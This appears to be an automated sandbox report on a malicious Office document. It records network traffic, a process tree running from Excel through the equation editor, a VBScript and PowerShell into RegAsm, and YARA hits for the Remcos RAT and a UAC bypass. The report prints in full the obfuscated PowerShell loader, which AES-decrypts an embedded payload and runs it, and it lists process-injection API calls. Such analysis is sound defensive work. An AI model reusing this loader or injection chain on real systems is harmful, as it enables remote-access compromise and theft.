                  ETag: "a1000-61e1d62d98767"
                  Accept-Ranges: bytes
                  Content-Length: 659456
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.22 | 49174 | 178.237.33.50 | 80 | 3384 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 26, 2024 13:09:03.401309013 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jul 26, 2024 13:09:04.026494980 CEST | 1170 | IN | HTTP/1.1 200 OK
                  date: Fri, 26 Jul 2024 11:09:03 GMT
                  server: Apache
                  content-length: 962
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                  Target ID:0
                  Start time:07:08:22
                  Start date:26/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f990000
                  File size:28'253'536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:07:08:45
                  Start date:26/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                  Imagebase:0x13f400000
                  File size:1'423'704 bytes
                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:07:08:52
                  Start date:26/07/2024
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543'304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:07:08:53
                  Start date:26/07/2024
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
                  Imagebase:0x940000
                  File size:141'824 bytes
                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:07:08:54
                  Start date:26/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                  Imagebase:0x140000
                  File size:427'008 bytes
                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:07:08:59
                  Start date:26/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Imagebase:0xac0000
                  File size:64'704 bytes
                  MD5 hash:8FE9545E9F72E460723F484C304314AD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false


                  Module: Sheet1

                  Declaration
                  Attribute VB_Name = "Sheet1"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True

                  Module: Sheet2

                  Declaration
                  Attribute VB_Name = "Sheet2"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True

                  Module: Sheet3

                  Declaration
                  Attribute VB_Name = "Sheet3"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True

                  Module: ThisWorkbook

                  Declaration
                  Attribute VB_Name = "ThisWorkbook"
                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True


                    Execution Graph

                    Execution Coverage:9.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:20%
                    Total number of Nodes:25
                    Total number of Limit Nodes:1
                    execution_graph 8274 1b77d28 8275 1b77d4f 8274->8275 8278 1b79689 8275->8278 8279 1b796cb 8278->8279 8280 1b77e5a 8279->8280 8287 1b78e61 WriteProcessMemory 8279->8287 8288 1b78e68 WriteProcessMemory 8279->8288 8289 1b791f4 8279->8289 8293 1b79200 8279->8293 8297 1b78b18 8279->8297 8301 1b78b20 8279->8301 8305 1b78a30 8279->8305 8309 1b78a28 8279->8309 8287->8279 8288->8279 8290 1b79287 CreateProcessA 8289->8290 8292 1b794e5 8290->8292 8294 1b79287 CreateProcessA 8293->8294 8296 1b794e5 8294->8296 8298 1b78b21 Wow64SetThreadContext 8297->8298 8300 1b78be7 8298->8300 8300->8279 8302 1b78b69 Wow64SetThreadContext 8301->8302 8304 1b78be7 8302->8304 8304->8279 8306 1b78a74 ResumeThread 8305->8306 8308 1b78ac6 8306->8308 8308->8279 8310 1b78a74 ResumeThread 8309->8310 8312 1b78ac6 8310->8312 8312->8279
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6cab009f17ece5e36771b547621ed156559d64c72fbc6945444037f358b572c7
                    • Instruction ID: 13144f66afdba9a843698368b0440208a32bb450c22d369d81c0437fefbff49f
                    • Opcode Fuzzy Hash: 6cab009f17ece5e36771b547621ed156559d64c72fbc6945444037f358b572c7
                    • Instruction Fuzzy Hash: F7620674E002298FDB68DF69C884BDDBBF2AF89314F5481EAD409A7295DB305E85CF50
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a5abb6a1cd7f91c445216bbdfb755bc718aa5f04a5c8459755e426914a2840c6
                    • Instruction ID: d4167efba2012f27f79cb4233ffa95bc67f2f1844e4284611f31a7d8786fa6e6
                    • Opcode Fuzzy Hash: a5abb6a1cd7f91c445216bbdfb755bc718aa5f04a5c8459755e426914a2840c6
                    • Instruction Fuzzy Hash: 01223C34A01248AFDB19DFA8D484A9DFBF2FF48314F248599E414AB361C775ED86CB90

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$4'p$4'p$4'p$4'p
                    • API String ID: 0-2314922075
                    • Opcode ID: 6e7297e656de47acd1b62d6d7fca116e01fcb27986134088b3c15e9086c5b71a
                    • Instruction ID: 09c9fdb5207b7745ee6a913cb34cd4c5456c3fed63602bc3972d4ef4bcda94f9
                    • Opcode Fuzzy Hash: 6e7297e656de47acd1b62d6d7fca116e01fcb27986134088b3c15e9086c5b71a
                    • Instruction Fuzzy Hash: 7BE11531B00305AFDB159E7DD8506AABFF2BFC9210F2484AAD945CB252EB71CD41D7A2

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p$$p
                    • API String ID: 0-3219492093
                    • Opcode ID: 27eedf0190d1532935dff1e0c3d2d163205831f917b537940dd6dc6a01a0a6a9
                    • Instruction ID: 8332e0f4fbb4baaf578632b67c3a8801e31e0bd9c186a36fc4c4a5c7a2cc38a2
                    • Opcode Fuzzy Hash: 27eedf0190d1532935dff1e0c3d2d163205831f917b537940dd6dc6a01a0a6a9
                    • Instruction Fuzzy Hash: BCC10635B003119FDB189F6CD851A6AFBF6AFC8310B28C26AD945CB252EB31DD42C791

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (op$(op$L4p$L4p$L4p
                    • API String ID: 0-2509652690
                    • Opcode ID: 7346659c00055b701c961b7ed4298a583bc1624d72cc2bbf8f5fc60c26c9e3c4
                    • Instruction ID: 96b0b081e5e2a70ac7262b0ad7f48d54e0fc4d93f041324703fc88e76b06027d
                    • Opcode Fuzzy Hash: 7346659c00055b701c961b7ed4298a583bc1624d72cc2bbf8f5fc60c26c9e3c4
                    • Instruction Fuzzy Hash: 44B12831700344DFDF159F6CE850BAEBFA2AF89311F148466EA568B292EB71D842C753

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p
                    • API String ID: 0-2334450948
                    • Opcode ID: c3a593c2f091c1204c8701dc31c232cd560dae2dbce33f6a920eaa8ab90e0426
                    • Instruction ID: afe68f0fbd8cd3e4a31053dac28415f2a8cc4dcbf6bb2777e239f2e5a24a9bd3
                    • Opcode Fuzzy Hash: c3a593c2f091c1204c8701dc31c232cd560dae2dbce33f6a920eaa8ab90e0426
                    • Instruction Fuzzy Hash: 12C107317043519FDB169A7CD410B7ABFE2AFCA310F24806BD985CB292EB75D842C7A1

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$$p$$p
                    • API String ID: 0-2931952147
                    • Opcode ID: 2f5e26ce46b0764f45e5f928867af9e3972cfbe63c531c2c83d89b0b11fcb7a3
                    • Instruction ID: b2081c09697720dc3f01bf6d02c45281d1371a19b66767173b414b737117b3c8
                    • Opcode Fuzzy Hash: 2f5e26ce46b0764f45e5f928867af9e3972cfbe63c531c2c83d89b0b11fcb7a3
                    • Instruction Fuzzy Hash: 8C313570A00215DFEF269E2CD41077A7BF1AF8C215F148136D944DB652FBB1D881CB61

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p
                    • API String ID: 0-3973980265
                    • Opcode ID: 2a5657361956f09d5b338a4cb2079e53c4d02fcfb2d9a18a7f2d7c9107027ecd
                    • Instruction ID: 799a55ffb33031cfaefcc4ed264af98e45a5213a3ed9232ef7ff84ccb776555e
                    • Opcode Fuzzy Hash: 2a5657361956f09d5b338a4cb2079e53c4d02fcfb2d9a18a7f2d7c9107027ecd
                    • Instruction Fuzzy Hash: C5E0D831708240DADF5B6678A0313ADBFA26FC6171F54809BC5C08624AEB31CD16C392

                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01B794C7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: ad80bc55231cf41022183d615ddddabd72cd3f2d7b98b33185953a401fcc0876
                    • Instruction ID: 56a4572bd2a7d81c6091077c270ee7821ceeb69f37a2a3fc580218a8ac6c0b4c
                    • Opcode Fuzzy Hash: ad80bc55231cf41022183d615ddddabd72cd3f2d7b98b33185953a401fcc0876
                    • Instruction Fuzzy Hash: 30C13871D002198FDF24DFA8C880BEDBBB1BF09314F0491AAD959B7290DB749A85CF94

                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01B794C7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: eb9db0afd04353b89d515c485fff4247712b4f1523d06a271f9855cbcc284763
                    • Instruction ID: 07979b1392953ea14ba43ecd1165518568fb148c377c3260cf19b68aef28b5d6
                    • Opcode Fuzzy Hash: eb9db0afd04353b89d515c485fff4247712b4f1523d06a271f9855cbcc284763
                    • Instruction Fuzzy Hash: E4C12771D002198FDF25DFA8C880BEEBBB1BF09314F0491A9D959B7290DB749A85CF94

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01B78F3B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 7fe8dc12b2b92539586147e9324911b83ecfd896410d370b621df1dd49391561
                    • Instruction ID: 77f1f704f9953d68d4c7a5d6370ca6f877d802ed1c9e49086f5996c41a5a52a7
                    • Opcode Fuzzy Hash: 7fe8dc12b2b92539586147e9324911b83ecfd896410d370b621df1dd49391561
                    • Instruction Fuzzy Hash: F041BBB5D002489FCF04CFA9D984AEEFBF1BB49310F20942AE914BB240C335AA45CB64

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01B78F3B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 25da3a8e51f2edb5756b1c68db5c0d1071ca020467d365de577da7966e1355f7
                    • Instruction ID: 0423024c1ca2e063377c391ee8b1cc169e2dff7ab0dcae5ad5476ade0a651c5f
                    • Opcode Fuzzy Hash: 25da3a8e51f2edb5756b1c68db5c0d1071ca020467d365de577da7966e1355f7
                    • Instruction Fuzzy Hash: 1741ABB5D012489FCF04CFA9D984AEEFBF1BB49314F20942AE915BB250D334AA45CF64

                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01B78BCF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: b6392fe624475b9f94f2992e54f3de4b608357e88c4d4fcc58c0b6a575ec7be3
                    • Instruction ID: 7939c3c9356296068169ab387c30234415169d364d5373438aeaf7cd51480f17
                    • Opcode Fuzzy Hash: b6392fe624475b9f94f2992e54f3de4b608357e88c4d4fcc58c0b6a575ec7be3
                    • Instruction Fuzzy Hash: 0541BBB4D002589FCF14CFA9D984AEEFBB1BF49314F24842AE815B7240D779A945CFA4

                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01B78BCF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 01430705562907c93d18d6da387041c41973208d1937369041a2a833695977e8
                    • Instruction ID: cdd961c0cc699bd8834bb975a48b204b4355a1da46a49d4d9a5fd053925375fc
                    • Opcode Fuzzy Hash: 01430705562907c93d18d6da387041c41973208d1937369041a2a833695977e8
                    • Instruction Fuzzy Hash: 8541BCB4D002589FCF14CFA9D984AEEFBF1BB48314F14842AE415B7240D739A945CF64

                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 01B78AAE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 930f06362528dca1fb04133e94279ce29b6cd82f24956d9e776ffaddcf836c66
                    • Instruction ID: 5b9df3f8d8682b9c1937f64a096ce49664d28bd2e5a2b7b5587c58b5115454ce
                    • Opcode Fuzzy Hash: 930f06362528dca1fb04133e94279ce29b6cd82f24956d9e776ffaddcf836c66
                    • Instruction Fuzzy Hash: 3131D8B4D002189FCF14CFA9D984AEEFBB0AB49314F14842AE815B7310C735A905CF94

                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 01B78AAE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 2910b0c4d9bed7b4a296e67238fdfe8e0c6b2b898187900f1046e9d1f926759a
                    • Instruction ID: d3009812c1575e80d11d3a94c327619dac80ef98d9f3a97480da2fccfdcaefe7
                    • Opcode Fuzzy Hash: 2910b0c4d9bed7b4a296e67238fdfe8e0c6b2b898187900f1046e9d1f926759a
                    • Instruction Fuzzy Hash: B831DAB4D002189FCF14CFAAD984AAEFBB1BF49314F14842AE815B7310C734A905CF94

                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 54ab3a3012e8c72008a6932e1adf7d1d2efb87e7f841138a40678a799abb2bd2
                    • Instruction ID: 1dc5d964ce52d26897ca89a7f2146e133c2adc6d8bd56ca90cced342ab1b2df6
                    • Opcode Fuzzy Hash: 54ab3a3012e8c72008a6932e1adf7d1d2efb87e7f841138a40678a799abb2bd2
                    • Instruction Fuzzy Hash: 991189753002159FEB14DE59C881E7AF7AAFFC8350B1DC26AE9088B256DB32DD41CB91
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 83c761ac4d0cbce7dd6d005bfce834430b882efed3f316a7ded7a6ee8eb0e4a1
                    • Instruction ID: 5e4073c99dfaa49b3a746f7987728acb4fb8b277072f5c733ec12bff85669e55
                    • Opcode Fuzzy Hash: 83c761ac4d0cbce7dd6d005bfce834430b882efed3f316a7ded7a6ee8eb0e4a1
                    • Instruction Fuzzy Hash: 4A1194753002109FEB14DE49C881E7AF7AAFFC8350B1DC26AE9088B255DB32DD41CB91
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436508438.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_28d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
